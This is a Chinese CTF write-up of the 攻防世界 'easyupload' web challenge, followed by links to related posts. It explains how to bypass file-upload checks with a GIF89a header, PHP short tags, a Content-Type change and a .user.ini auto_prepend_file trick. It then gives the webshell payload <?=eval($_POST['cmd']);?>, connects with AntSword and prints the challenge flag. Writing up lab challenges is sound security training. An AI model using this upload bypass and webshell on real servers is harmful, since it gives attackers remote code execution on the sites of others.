攻防世界WEB练习-easyupload
前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
攻防世界专栏:https://blog.csdn.net/m0_63127854/category_11983747.html
Upload-labs专栏:https://blog.csdn.net/m0_63127854/category_11850783.html
网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan
目录
题目场景
查看源码
官方WriteUp
BP抓包
F12查看文件去向
蚁剑连接
找到flag
题目场景
查看源码
毫无有效的数据
官方WriteUp
本题需要利用文件上传漏洞点,通过绕过服务器的安全防护,达到getshell的目的
本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行
这里需要绕过的点如下
检查文件内容是否有php字符串检查后缀中是否有htaccess或ph检查文件头部信息文件MIME类型
对于第一点可以利用短标签绕过,例如<?=phpinfo();?>
对于第二点可以通过上传.user.ini以及正常jpg文件来进行getshell,可以参考以下文章
https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html
在服务器中,只要是运用了fastcgi的服务器就能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。
这个文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。
其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制,比如auto_prepend_file。
第三点绕过方式即在文件头部添加一个图片的文件头,比如GIF89a
第四点绕过方法即修改上传时的Content-Type
因此最终的payload为:
上传.user.ini,内容为
GIF89a
auto_prepend_file=a.jpg
上传a.jpg,内容为
GIF89a
<?=eval($_POST['cmd']);?>
BP抓包
上传.user.ini
再上传a.jpg
F12查看文件去向
蚁剑连接
打开flag查看
找到flag
cyberpeace{85f32dea0ed6b7be27fa02c28a97228f}
攻防世界WEB练习-easyupload相关推荐
- 【愚公系列】2023年05月 攻防世界-Web(easyupload)
文章目录 前言 一.easyupload 1.题目 2.答题 前言 文件上传漏洞是指攻击者通过上传恶意文件的方式,绕过服务器的安全机制,向服务器上传含有恶意代码的文件,从而实现对服务器的攻击. 攻击者 ...
- 攻防世界 web篇(一)
攻防世界 web篇(一) inget fileclude easyupload fileinclude very_easy_sql 攻防世界 是一群信息安全大咖共同研究的答题.竞赛.以游戏方式结合的一 ...
- CTF:攻防世界web PART01
写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 攻防世界web PART01 baby_web Traini ...
- 攻防世界 web高手进阶区 9分题 favorite_number
前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...
- 攻防世界——web新手题
攻防世界----web新手题 1. robots 打开题目场景,发现与robots协议有关,上网搜索robots协议的内容: Robots协议(也称为爬虫协议.机器人协议等)的全称是"网络爬 ...
- 攻防世界 web高手进阶区 10分题 weiphp
前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...
- 攻防世界Web第一天
攻防世界[Web]第一天 [Web]第一题 解题步骤 总结 [Web]第一题 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了. 解题步骤 第一:获取在线场景,进入浏览页面. ...
- 攻防世界Web题 - unseping 总结
攻防世界Web题 - unseping 总结 1.审题 进入题目,可以看出来是典型的php反序列化题目. 2.源代码分析 <?php highlight_file(__FILE__); //显示 ...
- 攻防世界-----web知识点总结
WEB 一. 网页源代码的方式 在地址栏前面加上view-source,如view-source:https://www.baidu.com 浏览器的设置菜单框中使用开发者工具,也可以查看网页源代码. ...
最新文章
- What is mobile platform?
- url散列算法原理_如何列出与网站相关的所有URL
- 10-关于DOM的事件操作
- Kafka核心源码解析 - KafkaApis源码解析
- Python+pandas实现时间序列数据扩展案例一则
- 整合vue_直指核心,7天成为Vue高手
- 2020年日历电子版(打印版)_灵感 | 快来康康——2020年的日历设计的这么有创意?...
- L3-029 还原文件 (30 分)-PAT 团体程序设计天梯赛 GPLT
- css选择器优先顺序
- php中去除数组中空值,php如何去除数组中空值
- 用python做股票量化分析豆瓣_快速入门 Python 爬虫
- 数据结构课设之航空订票系统(Java)下载链接在文末
- 闪寸 U盘 检测工具 量产工具
- mssql数据库和Oracle数据库注入
- CSS3动画实现牛顿摆
- 蓝桥杯:跳蚂蚱【BFS】【Python】
- 成都盛迈坤电商:评价怎么有效回复
- Silicon Labs EFR32 RF射频测试-RAILTEST
- SAPUI5是什么?Fiori告诉我们将来UI开发用哪种技术?
- TCP/IP详解之环回接口(loopback interface)
热门文章
- 省份、区域(华南,华北...)自定义颜色
- 【CV】Mask R-CNN:用于目标实例分割的通用框架
- 两个对象值相同(x.equals(y) == true),但却可有不同的hash code,这句话对不对
- 什么是抽象类,为什么要写抽象类
- R语言获取GEO表达数据
- (超简单)ESP8266深度睡眠模式下远程采集温湿度信息
- 支付宝手机网站支付开发详细流程
- SSL数字证书申请要多少钱?
- 我的世界神奇宝贝服务器注册指令,我的世界神奇宝贝MOD召唤指令汇总攻略
- Photoshop脚本 蒙尘与划痕滤镜的使用